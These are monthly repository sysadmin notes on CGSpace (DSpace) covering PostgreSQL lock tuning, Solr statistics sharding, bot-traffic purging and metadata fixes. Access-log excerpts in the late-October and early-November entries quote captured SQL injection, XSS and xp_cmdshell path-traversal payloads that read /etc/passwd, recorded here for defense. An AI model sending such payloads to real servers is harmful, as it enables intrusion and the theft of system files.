- Several users wrote to me that CGSpace was slow recently
- Looking at the PostgreSQL database I see connections look normal, but locks for `dspaceWeb` are high:
```console
$ psql -c 'SELECT * FROM pg_stat_activity' | wc -l
53
$ psql -c "SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid" | wc -l
1697
$ psql -c "SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid WHERE application_name='dspaceWeb'" | wc -l
1681
```
- Looking at Munin, I see there are indeed a higher number of locks starting on the morning of 2021-10-07:
![PostgreSQL locks week](/cgspace-notes/2021/10/postgres_locks_ALL-week.png)
- The only thing I did on 2021-10-07 was import a few thousand metadata corrections...
- I restarted PostgreSQL (instead of restarting Tomcat), so let's see if that helps
- I filed [a bug for the DSpace 6/7 duplicate values metadata import issue](https://github.com/DSpace/DSpace/issues/7989)
- I tested the two patches for removing abandoned submissions from the workflow but unfortunately it seems that they are for the configurable aka XML workflow, and we are using the basic workflow
- I discussed PostgreSQL issues with some people on the DSpace Slack
- Looking at postgresqltuner.pl and https://pgtune.leopard.in.ua I realized that there were some settings that I hadn't changed in a few years that I probably need to re-evaluate
- For example, `random_page_cost` is recommended to be 1.1 in the PostgreSQL 10 docs (the default is 4.0, but we have used 1 since 2017, when it came up on Hacker News)
- Also, `effective_io_concurrency` is recommended to be "hundreds" if you are using an SSD (default is 1)
- I also enabled the `pg_stat_statements` extension to try to understand what queries are being run the most often, and how long they take
## 2021-10-12
- I looked again at the duplicate items query I was doing with trigrams recently and found a few new things
- Looking at the `EXPLAIN ANALYZE` plan for the query I noticed it wasn't using any indexes
- I [read on StackExchange](https://dba.stackexchange.com/questions/103821/best-index-for-similarity-function/103823) that, if we want to make use of indexes, we need to use the similarity operator (`%`), not the function `similarity()` because "index support is bound to operators in Postgres, not to functions"
- A note about the query plan output is that we need to read it from the bottom up!
- So with the similarity operator we need to set the threshold like this now:
```console
localhost/dspace= > SET pg_trgm.similarity_threshold = 0.5;
```
- Next I experimented with using GIN or GiST indexes on `metadatavalue`, but they were slower than the existing DSpace indexes
- I tested a few variations of the query I had been using and found it's _much_ faster if I use the similarity operator and keep the condition that object IDs are in the item table...
```console
localhost/dspace= > SELECT text_value, dspace_object_id FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=64 AND text_value % 'Traditional knowledge affects soil management ability of smallholder farmers in marginal areas';
text_value │ dspace_object_id
────────────────────────────────────────────────────────────────────────────────────────────────┼──────────────────────────────────────
Traditional knowledge affects soil management ability of smallholder farmers in marginal areas │ 7af059af-9cd7-431b-8a79-7514896ca7dc
(1 row)
Time: 739.948 ms
```
- Now this script runs in four minutes (versus twenty-four!) and it still finds the same seven duplicates! Amazing!
- I still don't understand the differences in the query plan well enough, but I see it is using the DSpace default indexes and the results are accurate
- So to summarize, from the best to the worst query, all returning the same result:
```console
localhost/dspace= > SET pg_trgm.similarity_threshold = 0.6;
localhost/dspace= > SELECT text_value, dspace_object_id FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=64 AND text_value % 'Traditional knowledge affects soil management ability of smallholder farmers in marginal areas';
text_value │ dspace_object_id
────────────────────────────────────────────────────────────────────────────────────────────────┼──────────────────────────────────────
Traditional knowledge affects soil management ability of smallholder farmers in marginal areas │ 7af059af-9cd7-431b-8a79-7514896ca7dc
(1 row)
Time: 683.165 ms
Time: 635.364 ms
Time: 674.666 ms
localhost/dspace= > DISCARD ALL;
localhost/dspace= > SET pg_trgm.similarity_threshold = 0.6;
localhost/dspace= > SELECT text_value, dspace_object_id FROM metadatavalue WHERE metadata_field_id=64 AND text_value % 'Traditional knowledge affects soil management ability of smallholder farmers in marginal areas';
text_value │ dspace_object_id
────────────────────────────────────────────────────────────────────────────────────────────────┼──────────────────────────────────────
Traditional knowledge affects soil management ability of smallholder farmers in marginal areas │ 7af059af-9cd7-431b-8a79-7514896ca7dc
(1 row)
Time: 1584.765 ms (00:01.585)
Time: 1665.594 ms (00:01.666)
Time: 1623.726 ms (00:01.624)
localhost/dspace= > DISCARD ALL;
localhost/dspace= > SELECT text_value, dspace_object_id FROM metadatavalue WHERE metadata_field_id=64 AND SIMILARITY(text_value,'Traditional knowledge affects soil management ability of smallholder farmers in marginal areas') > 0.6;
text_value │ dspace_object_id
────────────────────────────────────────────────────────────────────────────────────────────────┼──────────────────────────────────────
Traditional knowledge affects soil management ability of smallholder farmers in marginal areas │ 7af059af-9cd7-431b-8a79-7514896ca7dc
(1 row)
Time: 4028.939 ms (00:04.029)
Time: 4022.239 ms (00:04.022)
Time: 4061.820 ms (00:04.062)
localhost/dspace= > DISCARD ALL;
localhost/dspace= > SELECT text_value, dspace_object_id FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=64 AND SIMILARITY(text_value,'Traditional knowledge affects soil management ability of smallholder farmers in marginal areas') > 0.6;
text_value │ dspace_object_id
────────────────────────────────────────────────────────────────────────────────────────────────┼──────────────────────────────────────
Traditional knowledge affects soil management ability of smallholder farmers in marginal areas │ 7af059af-9cd7-431b-8a79-7514896ca7dc
(1 row)
Time: 4358.713 ms (00:04.359)
Time: 4301.248 ms (00:04.301)
Time: 4417.909 ms (00:04.418)
```
## 2021-10-13
- I looked into the [REST API issue where fields without qualifiers throw an HTTP 500](https://github.com/DSpace/DSpace/issues/7946)
- The fix is to check if the qualifier is not null AND not empty in dspace-api
- I submitted a fix: https://github.com/DSpace/DSpace/pull/7993
## 2021-10-14
- Someone in the DSpace community already posted a fix for the DSpace 6/7 duplicate items export bug!
- I tested it and it works so I left feedback: https://github.com/DSpace/DSpace/pull/7995
- Altmetric support got back to us about the missing DOI/Handle link and said it was due to the TLS certificate chain on CGSpace
- I checked and everything is actually working fine, so it could be their backend servers are old and don't support the new Let's Encrypt trust path
- I asked them to put me in touch with their backend developers directly
## 2021-10-17
- Revert the ssl-cert change on the Ansible infrastructure scripts so that nginx uses a manually generated "snakeoil" TLS certificate
- The ssl-cert one is easier because it's automatic, but they include the hostname in the bogus cert so it's an unnecessary leak of information
- I started doing some tests to upgrade Elasticsearch from 7.6.2 to 7.7, 7.8, 7.9, and eventually 7.10 on OpenRXV
- I tested harvesting, reporting, filtering, and various admin actions with each version and they all worked fine, with no errors in any logs as far as I can see
- This fixes bunches of issues, updates Java from 13 to 15, and the base image from CentOS 7 to 8, so it's a decent amount of technical debt!
- I even tried Elasticsearch 7.13.2, which has Java 16, and it works fine...
- I submitted a pull request: https://github.com/ilri/OpenRXV/pull/126
## 2021-10-20
- Meeting with Big Data and CGIAR repository players about the feasibility of moving to a single repository
- We discussed several options, for example moving all DSpaces to CGSpace along with their permanent identifiers
- The issue would be for centers like IFPRI, who don't use DSpace and have integrations between their current repository and their website, etc.
## 2021-10-21
- Udana from IWMI contacted me to ask if I could do a one-off AReS harvest because they have some new items they need to report on
## 2021-10-22
- Abenet and others contacted me to say that the LDAP login was not working on CGSpace
- I checked with `ldapsearch` and it is indeed not working:
```console
$ ldapsearch -x -H ldaps://AZCGNEROOT3.CGIARAD.ORG:636/ -b "dc=cgiarad,dc=org" -D "booo" -W "(sAMAccountName=fuuu)"
Enter LDAP Password:
ldap_bind: Invalid credentials (49)
additional info: 80090308: LdapErr: DSID-0C090447, comment: AcceptSecurityContext error, data 52e, v3839
```
- I sent a message to ILRI ICT to ask them to check the account
- They reset the password so I ran all system updates and rebooted the server since users weren't able to log in anyways
## 2021-10-24
- CIP was asking about CGSpace stats again
- The last time I helped them with this was in 2021-04, when I extracted stats for their community from the DSpace Statistics API
- In looking at the CIP stats request I got curious if there were any hits from all those Russian IPs before 2021-07 that I could purge
- Sure enough there were a few hundred IPs belonging to those ASNs:
```console
$ http 'localhost:8081/solr/statistics/select?q=time%3A2021-04*&fl=ip&wt=json&indent=true&facet=true&facet.field=ip&facet.limit=200000&facet.mincount=1' > /tmp/2021-04-ips.json
# Ghetto way to extract the IPs using jq, but I can't figure out how to only print them and not the facet counts, so I just use sed
$ jq '.facet_counts.facet_fields.ip[]' /tmp/2021-04-ips.json | grep -E '^"' | sed -e 's/"//g' > /tmp/ips.txt
$ ./ilri/resolve-addresses-geoip2.py -i /tmp/ips.txt -o /tmp/2021-04-ips.csv
$ csvgrep -c asn -r '^(49453|46844|206485|62282|36352|35913|35624|8100)$' /tmp/2021-04-ips.csv | csvcut -c network | sed 1d | sort -u > /tmp/networks-to-block.txt
$ wc -l /tmp/networks-to-block.txt
125 /tmp/networks-to-block.txt
$ grepcidr -f /tmp/networks-to-block.txt /tmp/ips.txt > /tmp/ips-to-purge.txt
$ wc -l /tmp/ips-to-purge.txt
202
```
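- As an aside, Solr's facet output is just a flat list alternating value and count, so a few lines of Python could replace the jq/sed step (a sketch reading the same JSON dump):
```python
# Sketch of extracting only the IPs from the Solr facet output, which is a
# flat list alternating between facet value and count: [ip, count, ip, count, ...]
import json

with open("/tmp/2021-04-ips.json") as f:
    facets = json.load(f)["facet_counts"]["facet_fields"]["ip"]

# Take every other element (the values), skipping the counts
for ip in facets[::2]:
    print(ip)
```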
- Attempting to purge those only shows about 3,500 hits, but I will do it anyways
- Adding 64.39.108.48 from Qualys I get a total of 22631 hits purged
- I also purged another 5306 hits after checking the IPv4 list from AbuseIPDB.com
## 2021-10-25
- Help CIP colleagues with view and download statistics for their community in 2020 and 2021
## 2021-10-27
- Help ICARDA colleagues with GLDC reports on AReS
- There was an issue due to differences in CRP metadata between repositories
## 2021-10-28
- Meeting with Medha and a bunch of others about the FAIRscribe tool they have been developing
- Seems it is a submission tool like MEL
## 2021-10-29
- Linode alerted me that CGSpace (linode18) has high outbound traffic for the last two hours
- This has happened a few other times this week so I decided to go look at the Solr stats for today
- I see 93.158.91.62 is making thousands of requests to Discover with a normal user agent:
```
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
```
- Even more annoying, they are not re-using their session ID:
```console
$ grep 93.158.91.62 log/dspace.log.2021-10-29 | grep -oE 'session_id=[A-Z0-9]{32}:ip_addr=' | sort | uniq | wc -l
4888
```
- This IP has made 36,000 requests to CGSpace...
- The IP is owned by [Internet Vikings](https://internetvikings.com) in Sweden
- I purged their statistics and set up a temporary HTTP 403 telling them to use a real user agent
- I see another one in Sweden a few days ago (192.36.109.131), also using the same exact user agent as above, but belonging to [Resilans AB](http://webb.resilans.se/)
- I purged another 74,619 hits from this bot
- I added these two IPs to the nginx IP bot identifier
- Jesus, I found a few Russian IPs attempting SQL injection and path traversal, for example:
```
45.9.20.71 - - [20/Oct/2021:02:31:15 +0200] "GET /bitstream/handle/10568/1820/Rhodesgrass.pdf?sequence=4&OoxD=6591%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2CNULL%2C%27%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%27%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1--%2F%2A%2A%2F%3B%20EXEC%20xp_cmdshell%28%27cat%20..%2F..%2F..%2Fetc%2Fpasswd%27%29%23 HTTP/1.1" 200 143070 "https://cgspace.cgiar.org:443/bitstream/handle/10568/1820/Rhodesgrass.pdf" "Mozilla/5.0 (X11; U; Linux i686; es-AR; rv:1.8.1.11) Gecko/20071204 Ubuntu/7.10 (gutsy) Firefox/2.0.0.11"
```
- I reported them to AbuseIPDB.com and purged their hits:
```console
$ ./ilri/check-spider-ip-hits.sh -f /tmp/ip.txt -p
Purging 6364 hits from 45.9.20.71 in statistics
Purging 8039 hits from 45.146.166.157 in statistics
Purging 3383 hits from 45.155.204.82 in statistics
Total number of bot hits purged: 17786
```
## 2021-10-31
- Update Docker containers for AReS on linode20 and run a fresh harvest
- Found some strange IP (94.71.3.44) making 51,000 requests today with the user agent "Microsoft Internet Explorer"
- It is in Greece, and it seems to be requesting each item's XMLUI full metadata view, so I suspect it's Gardian actually
- I found it making another 25,000 requests yesterday...
- I purged them from Solr
- Found 20,000 hits from Qualys (according to AbuseIPDB.com) using normal user agents... ugh, must be some ILRI ICT scan
- Found more requests from a Swedish IP (93.158.90.34) using that weird Firefox user agent that I noticed a few weeks ago:
```
Mozilla/5.0 (Macintosh; Intel Mac OS X 11.1; rv:84.0) Gecko/20100101 Firefox/84.0
```
- That's from ASN 12552 (IPO-EU, SE), which is operated by Internet Vikings, though AbuseIPDB.com says it's [Availo Networks AB](https://availo.se)
- There's another IP (3.225.28.105) that made a few thousand requests to the REST API from Amazon, though it's using a normal user agent
```console
# zgrep 3.225.28.105 /var/log/nginx/rest.log.* | wc -l
3991
# zgrep 3.225.28.105 /var/log/nginx/rest.log.* | grep -oE 'GET /rest/(collections|handle|items)' | sort | uniq -c
3154 GET /rest/collections
427 GET /rest/handle
410 GET /rest/items
```
- It requested the [CIAT Story Maps](https://cgspace.cgiar.org/handle/10568/75560) collection over 3,000 times last month...
- I will purge those hits
<!-- vim: set sw=2 ts=2: -->

content/posts/2021-11.md
---
title: "November, 2021"
date: 2021-11-02T22:27:07+02:00
author: "Alan Orth"
categories: ["Notes"]
---
## 2021-11-02
- I experimented with manually sharding the Solr statistics on DSpace Test
- First I exported all the 2019 stats from CGSpace:
```console
$ ./run.sh -s http://localhost:8081/solr/statistics -f 'time:2019-*' -a export -o statistics-2019.json -k uid
$ zstd statistics-2019.json
```
<!--more-->
- Then on DSpace Test I created a `statistics-2019` core with the same instance dir as the main `statistics` core (as [illustrated in the DSpace docs](https://wiki.lyrasis.org/display/DSDOC6x/Testing+Solr+Shards))
```console
$ mkdir -p /home/dspacetest.cgiar.org/solr/statistics-2019/data
# create core in Solr admin
$ curl -s "http://localhost:8081/solr/statistics/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>time:2019-*</query></delete>"
$ ./run.sh -s http://localhost:8081/solr/statistics-2019 -a import -o statistics-2019.json -k uid
```
- The key thing above is that you create the core in the Solr admin UI, but the data directory must already exist so you have to do that first in the file system
- I restarted the server after the import was done to see if the cores would come back up OK
- I remember last time I tried this the manually created statistics cores didn't come back up after I rebooted, but this time they did
## 2021-11-03
- While inspecting the stats for the new statistics-2019 shard on DSpace Test I noticed that I can't find any stats via the DSpace Statistics API for an item that _should_ have some
- I checked on CGSpace's and I can't find them there either, but I see them in Solr when I query in the admin UI
- I need to debug that, but it doesn't seem to be related to the sharding...
## 2021-11-04
- I spent a little bit of time debugging the Solr bug with the statistics-2019 shard but couldn't reproduce it for the few items I tested
- So that's good, it seems the sharding worked
- Linode alerted me to high CPU usage on CGSpace (linode18) yesterday
- Looking at the Solr hits from yesterday I see 91.213.50.11 making 2,300 requests
- According to AbuseIPDB.com this is owned by Registrarus LLC (registrarus.ru) and it has been reported for malicious activity by several users
- The ASN is 50340 (SELECTEL-MSK, RU)
- They are attempting SQL injection:
```console
91.213.50.11 - - [03/Nov/2021:06:47:20 +0100] "HEAD /bitstream/handle/10568/106239/U19ArtSimonikovaChromosomeInthomNodev.pdf?sequence=1%60%20WHERE%206158%3D6158%20AND%204894%3D4741--%20kIlq&isAllowed=y HTTP/1.1" 200 0 "https://cgspace.cgiar.org:443/bitstream/handle/10568/106239/U19ArtSimonikovaChromosomeInthomNodev.pdf" "Mozilla/5.0 (X11; U; Linux i686; en-CA; rv:1.8.0.10) Gecko/20070223 Fedora/1.5.0.10-1.fc5 Firefox/1.5.0.10"
```
- Another is in China, and they grabbed 1,200 PDFs from the REST API in under an hour:
```console
# zgrep 222.129.53.160 /var/log/nginx/rest.log.2.gz | wc -l
1178
```
- I will continue to split the Solr statistics back into year-shards on DSpace Test (linode26)
- Today I did all 2018 stats...
- I want to see if there is a noticeable change in JVM memory, Solr response time, etc
## 2021-11-07
- Update all Docker containers on AReS and rebuild OpenRXV:
```console
$ docker images | grep -v ^REPO | sed 's/ \+/:/g' | cut -d: -f1,2 | xargs -L1 docker pull
$ docker-compose build
```
- Then restart the server and start a fresh harvest
- Continue splitting the Solr statistics into yearly shards on DSpace Test (doing 2017, 2016, 2015, and 2014 today)
- Several users wrote to me last week to say that workflow emails haven't been working since 2021-10-21 or so
- I did a test on CGSpace and it's indeed broken:
```console
$ dspace test-email
About to send test email:
- To: fuuuu
- Subject: DSpace test email
- Server: smtp.office365.com
Error sending email:
- Error: javax.mail.SendFailedException: Send failure (javax.mail.AuthenticationFailedException: 535 5.7.139 Authentication unsuccessful, the user credentials were incorrect. [AM5PR0701CA0005.eurprd07.prod.outlook.com]
)
Please see the DSpace documentation for assistance.
```
- I sent a message to ILRI ICT to ask them to check the account/password
- I want to do one last test of the Elasticsearch updates on OpenRXV so I got a snapshot of the latest Elasticsearch volume used on the production AReS instance:
```console
# tar cJf openrxv_esData_7.tar.xz /var/lib/docker/volumes/openrxv_esData_7
```
- Then on my local server:
```console
$ mv ~/.local/share/containers/storage/volumes/openrxv_esData_7/ ~/.local/share/containers/storage/volumes/openrxv_esData_7.2021-11-07.bak
$ tar xf /tmp/openrxv_esData_7.tar.xz -C ~/.local/share/containers/storage/volumes --strip-components=4
$ find ~/.local/share/containers/storage/volumes/openrxv_esData_7 -type f -exec chmod 660 {} \;
$ find ~/.local/share/containers/storage/volumes/openrxv_esData_7 -type d -exec chmod 770 {} \;
# copy backend/data to /tmp for the repository setup/layout
$ rsync -av --partial --progress --delete provisioning@ares:/tmp/data/ backend/data
```
- This seems to work: all items, stats, and repository setup/layout are OK
- I merged my [Elasticsearch pull request](https://github.com/ilri/OpenRXV/pull/126) from last month into OpenRXV
## 2021-11-08
- File [an issue for the Angular flash of unstyled content](https://github.com/DSpace/dspace-angular/issues/1391) on DSpace 7
- Help Udana from IWMI with a question about CGSpace statistics
- He found conflicting numbers when using the community and collection modes in Content and Usage Analysis
- I sent him more numbers directly from the DSpace Statistics API
## 2021-11-09
- I migrated the 2013, 2012, and 2011 statistics to yearly shards on DSpace Test's Solr to continue my testing of memory / latency impact
- I found out why the CI jobs for the DSpace Statistics API had been failing the past few weeks
- When I reverted to using the original falcon-swagger-ui project after they apparently merged my Falcon 3 changes, it seems that they actually only merged the Swagger UI changes, not the Falcon 3 fix!
- I switched back to using my own fork and now it's working
- Unfortunately now I'm getting an error installing my dependencies with Poetry:
```console
RuntimeError
Unable to find installation candidates for regex (2021.11.9)
at /usr/lib/python3.9/site-packages/poetry/installation/chooser.py:72 in choose_for
68│
69│ links.append(link)
70│
71│ if not links:
→ 72│ raise RuntimeError(
73│ "Unable to find installation candidates for {}".format(package)
74│ )
75│
76│ # Get the best link
```
- So that's super annoying... I'm going to try using Pipenv again...
## 2021-11-10
- 93.158.91.62 is scraping us again
- That's an IP in Sweden that is clearly a bot, but pretending to use a normal user agent
- I added them to the "bot" list in nginx so the requests will share a common DSpace session with other bots and not create Solr hits, but still they are causing high outbound traffic
- I modified the nginx configuration to send them an HTTP 403 and tell them to use a bot user agent
## 2021-11-14
- I decided to update AReS to the latest OpenRXV version with Elasticsearch 7.13
- First I took backups of the Elasticsearch volume and OpenRXV backend data:
```console
$ docker-compose down
$ sudo tar cJf openrxv_esData_7-2021-11-14.tar.xz /var/lib/docker/volumes/openrxv_esData_7
$ cp -a backend/data backend/data.2021-11-14
```
- Then I checked out the latest git commit, updated all images, rebuilt the project:
```console
$ docker images | grep -v ^REPO | sed 's/ \+/:/g' | cut -d: -f1,2 | xargs -L1 docker pull
$ docker-compose build
$ docker-compose up -d
```
- Then I updated the repository configurations and started a fresh harvest
- Help Francesca from the Alliance with a question about embargos on CGSpace items
- I logged in as a normal user and a CGIAR user, and I was unable to access the PDF or full text of the item
- I was only able to access the PDF when I was logged in as an admin
## 2021-11-21
- Update all Docker images on AReS (linode20) and re-build OpenRXV
- Run all system updates and reboot the server
- Start a full harvest, but I noticed that the number of items being harvested was not complete, so I stopped it
- Run all system updates on CGSpace (linode18) and DSpace Test (linode26) and reboot them
- ICT finally got back to us about the passwords for SMTP so I updated that and tested it to make sure it's working
- Some bot with IP 87.203.87.141 in Greece is making tons of requests to XMLUI with the user agent `Microsoft Internet Explorer`
- I added them to the list of IPs in nginx that get an HTTP 403 with a message to use a real user agent
- I will also purge all their requests from Solr:
```console
$ ./ilri/check-spider-ip-hits.sh -f /tmp/ips -p
Purging 10893 hits from 87.203.87.141 in statistics
Total number of bot hits purged: 10893
```
- I did a bit more work documenting and tweaking the PostgreSQL configuration for CGSpace and DSpace Test in the Ansible infrastructure playbooks
- I finally deployed the changes on both servers
## 2021-11-22
- Udana asked me about validating on OpenArchives again
- According to my notes we actually completed this in 2021-08, but for some reason we are no longer on the list and I can't validate again
- There seems to be a problem with their website because every link I try to validate says it received an HTTP 500 response from CGSpace
## 2021-11-23
- Help RTB colleagues with thumbnail issues on their [2020 Annual Report](https://hdl.handle.net/10568/114576)
- The PDF seems to be in landscape mode or something and the first page is half width, so the thumbnail renders with the left half being white
- I generated a new one manually with libvips and it is better:
```console
$ vipsthumbnail AR\ RTB\ 2020.pdf -s 600 -o '%s.jpg[Q=85,optimize_coding,strip]'
```
- I sent an email to the OpenArchives.org contact to ask for help with the OAI validator
- Someone responded to say that there have been a number of complaints about this on the oai-pmh mailing list recently...
- I sent an email to Pythagoras from GARDIAN to ask if they can use a more specific user agent than "Microsoft Internet Explorer" for their scraper
- He said he will change the user agent
## 2021-11-24
- I had an idea to check our Solr statistics for hits from all the IPs that I have listed in nginx as being bots
- Other than a few that I ruled out that *may* be humans, these are all making requests within one month or with no user agent, which is highly suspicious:
```console
$ ./ilri/check-spider-ip-hits.sh -f /tmp/ips.txt
Found 8352 hits from 138.201.49.199 in statistics
Found 9374 hits from 78.46.89.18 in statistics
Found 2112 hits from 93.179.69.74 in statistics
Found 1 hits from 31.6.77.23 in statistics
Found 5 hits from 34.209.213.122 in statistics
Found 86772 hits from 163.172.68.99 in statistics
Found 77 hits from 163.172.70.248 in statistics
Found 15842 hits from 163.172.71.24 in statistics
Found 172954 hits from 104.154.216.0 in statistics
Found 3 hits from 188.134.31.88 in statistics
Total number of hits from bots: 295492
```
## 2021-11-27
- Peter sent me corrections for the authors that I had sent him back in 2021-09
- I did a quick sanity check on them with OpenRefine, filtering out all the metadata with no replacements, then ran them through my csv-metadata-quality script
- Then I imported them into my local instance as a test:
```console
$ ./ilri/fix-metadata-values.py -i /tmp/authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -t 'correct' -m 3
```
- Then I imported to CGSpace and started a full Discovery re-index:
```console
$ time chrt -b 0 ionice -c2 -n7 nice -n19 dspace index-discovery -b
real 272m43.818s
user 183m4.543s
sys 2m47.988
```
## 2021-11-28
- Run system updates on AReS server (linode20) and update all Docker containers and reboot
- Then I started a fresh harvest as I always do on Sunday
- I am experimenting with pinning npm version 7 on OpenRXV frontend because of these Angular errors:
```console
npm WARN EBADENGINE Unsupported engine {
npm WARN EBADENGINE package: '@angular-devkit/architect@0.901.15',
npm WARN EBADENGINE required: { node: '>= 10.13.0', npm: '^6.11.0 || ^7.5.6', yarn: '>= 1.13.0' },
npm WARN EBADENGINE current: { node: 'v12.22.7', npm: '8.1.3' }
npm WARN EBADENGINE }
```
## 2021-11-29
- Tezira reached out to me to say that submissions on CGSpace are taking forever
- I see a definite increase in locks in the last few days:
![PostgreSQL locks week](/cgspace-notes/2021/11/postgres_locks_ALL-week.png)
- The locks are all held by dspaceWeb (XMLUI):
```console
$ psql -c "SELECT application_name FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid" | sort | uniq -c | sort -n
1
1 ------------------
1 (1394 rows)
1 application_name
9 psql
1385 dspaceWeb
```
- I restarted PostgreSQL and the locks dropped down:
```console
$ psql -c "SELECT application_name FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid" | sort | uniq -c | sort -n
1
1 ------------------
1 (103 rows)
1 application_name
9 psql
94 dspaceWeb
```
## 2021-11-30
- IWMI sent me ORCID identifiers for some new staff
- We currently have 1332 unique identifiers, so this adds sixteen new ones:
```console
$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-identifier.xml /tmp/iwmi-orcids.txt | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq > /tmp/2021-11-30-combined-orcids.txt
$ wc -l /tmp/2021-11-30-combined-orcids.txt
1348 /tmp/2021-11-30-combined-orcids.txt
```
- After I combined them and removed duplicates, I resolved all the names using my `resolve-orcids.py` script:
```console
$ ./ilri/resolve-orcids.py -i /tmp/2021-11-30-combined-orcids.txt -o /tmp/2021-11-30-combined-orcids-names.txt
```
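- The resolution is essentially one lookup per identifier against the public ORCID API; a rough sketch (the response fields here are assumptions and the real `resolve-orcids.py` may differ):
```python
#!/usr/bin/env python3
# Rough sketch of resolving names for ORCID identifiers via the public ORCID
# API. The response structure here is an assumption; the real resolve-orcids.py
# may parse it differently and handle more edge cases.
import sys

import requests

with open(sys.argv[1]) as f:
    orcids = [line.strip() for line in f if line.strip()]

for orcid in orcids:
    response = requests.get(
        f"https://pub.orcid.org/v3.0/{orcid}/person",
        headers={"Accept": "application/json"},
    )
    response.raise_for_status()
    name = response.json().get("name") or {}
    given = (name.get("given-names") or {}).get("value", "")
    family = (name.get("family-name") or {}).get("value", "")
    print(f"{given} {family}: {orcid}".strip())
```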
- Then I updated some ORCID identifiers that had changed in the XML:
```console
$ cat 2021-11-30-fix-orcids.csv
cg.creator.identifier,correct
"ADEBOWALE AKANDE: 0000-0002-6521-3272","ADEBOWALE AD AKANDE: 0000-0002-6521-3272"
"Daniel Ortiz Gonzalo: 0000-0002-5517-1785","Daniel Ortiz-Gonzalo: 0000-0002-5517-1785"
"FRIDAY ANETOR: 0000-0003-3137-1958","Friday Osemenshan Anetor: 0000-0003-3137-1958"
"Sander Muilerman: 0000-0001-9103-3294","Sander Muilerman-Rodrigo: 0000-0001-9103-3294"
$ ./ilri/fix-metadata-values.py -i 2021-11-30-fix-orcids.csv -db dspace -u dspace -p 'fuuu' -f cg.creator.identifier -t 'correct' -m 247
```
- Tag existing items from IWMI's new authors with ORCID iDs using `add-orcid-identifiers-csv.py` (7 new metadata fields added):
```console
$ cat 2021-11-30-add-orcids.csv
dc.contributor.author,cg.creator.identifier
"Liaqat, U.W.","Umar Waqas Liaqat: 0000-0001-9027-5232"
"Liaqat, Umar Waqas","Umar Waqas Liaqat: 0000-0001-9027-5232"
"Munyaradzi, M.","Munyaradzi Junia Mutenje: 0000-0002-7829-9300"
"Mutenje, Munyaradzi","Munyaradzi Junia Mutenje: 0000-0002-7829-9300"
"Rex, William","William Rex: 0000-0003-4979-5257"
"Shrestha, Shisher","Nirman Shrestha: 0000-0002-0996-8611"
$ ./ilri/add-orcid-identifiers-csv.py -i 2021-11-30-add-orcids.csv -db dspace -u dspace -p 'fuuu'
```
<!-- vim: set sw=2 ts=2: -->

content/posts/2021-12.md
---
title: "December, 2021"
date: 2021-12-01T16:07:07+02:00
author: "Alan Orth"
categories: ["Notes"]
---
## 2021-12-01
- Atmire merged some changes I had submitted to the COUNTER-Robots project
- I updated our local spider user agents and then re-ran the list with my `check-spider-hits.sh` script on CGSpace:
```console
$ ./ilri/check-spider-hits.sh -f /tmp/agents -p
Purging 1989 hits from The Knowledge AI in statistics
Purging 1235 hits from MaCoCu in statistics
Purging 455 hits from WhatsApp in statistics
Total number of bot hits purged: 3679
```
<!--more-->
## 2021-12-02
- Francesca from Alliance asked me for help with approving a submission that was stuck
- I looked at the PostgreSQL activity and the locks are back up like they were earlier this week
```console
$ psql -c "SELECT application_name FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid" | sort | uniq -c | sort -n
1
1 ------------------
1 (1437 rows)
1 application_name
9 psql
1428 dspaceWeb
```
- Munin shows the same:
![PostgreSQL locks week](/cgspace-notes/2021/12/postgres_locks_ALL-week.png)
- Last month I enabled the `log_lock_waits` setting in PostgreSQL, so I checked the log and was surprised to find only a few lock waits since I restarted PostgreSQL three days ago:
```console
# grep -E '^2021-(11-29|11-30|12-01|12-02)' /var/log/postgresql/postgresql-10-main.log | grep -c 'still waiting for'
15
```
- I think you could analyze the locks for the `dspaceWeb` user (XMLUI) and find out what queries were locking... but it's so much information and I don't know where to start
- For now I just restarted PostgreSQL...
- Francesca was able to do her submission immediately...
- On a related note, I want to enable the `pg_stat_statements` feature to see which queries get run the most, so I created the extension on the CGSpace database (a minimal sketch is after this list)
- I was doing some research on PostgreSQL locks and found some interesting things to consider
- The default `lock_timeout` is 0, aka disabled
- The default `statement_timeout` is 0, aka disabled
- It seems to be recommended to start by setting `statement_timeout` first, rule of thumb [ten times longer than your longest query](https://github.com/jberkus/annotated.conf/blob/master/postgresql.10.simple.conf#L211)
- Mark Wood mentioned the `checker` cron job that apparently runs in one transaction and might be an issue
- I definitely saw it holding a bunch of locks for ~30 minutes during the first part of its execution, then it dropped them and did some other less-intensive things without locks
- Bizuwork was still not receiving emails even after we fixed the SMTP access on CGSpace
- After some troubleshooting it turns out that the emails from CGSpace were going in her Junk!
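- A minimal sketch of what I mean with `pg_stat_statements` and `statement_timeout` (the module has to be in `shared_preload_libraries` before the view returns anything, and the timeout value here is only an example, not something I have actually set):
```console
$ psql -d dspace -c 'CREATE EXTENSION IF NOT EXISTS pg_stat_statements;'
$ psql -d dspace -c 'SELECT calls, round(total_time::numeric, 2) AS total_ms, left(query, 60) AS query FROM pg_stat_statements ORDER BY calls DESC LIMIT 10;'
$ psql -d dspace -c "ALTER DATABASE dspace SET statement_timeout = '300s';"
```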
## 2021-12-03
- I see GARDIAN is now using a "GARDIAN" user agent finally
- I will add them to our local spider agent override in DSpace so that the hits don't get counted in Solr
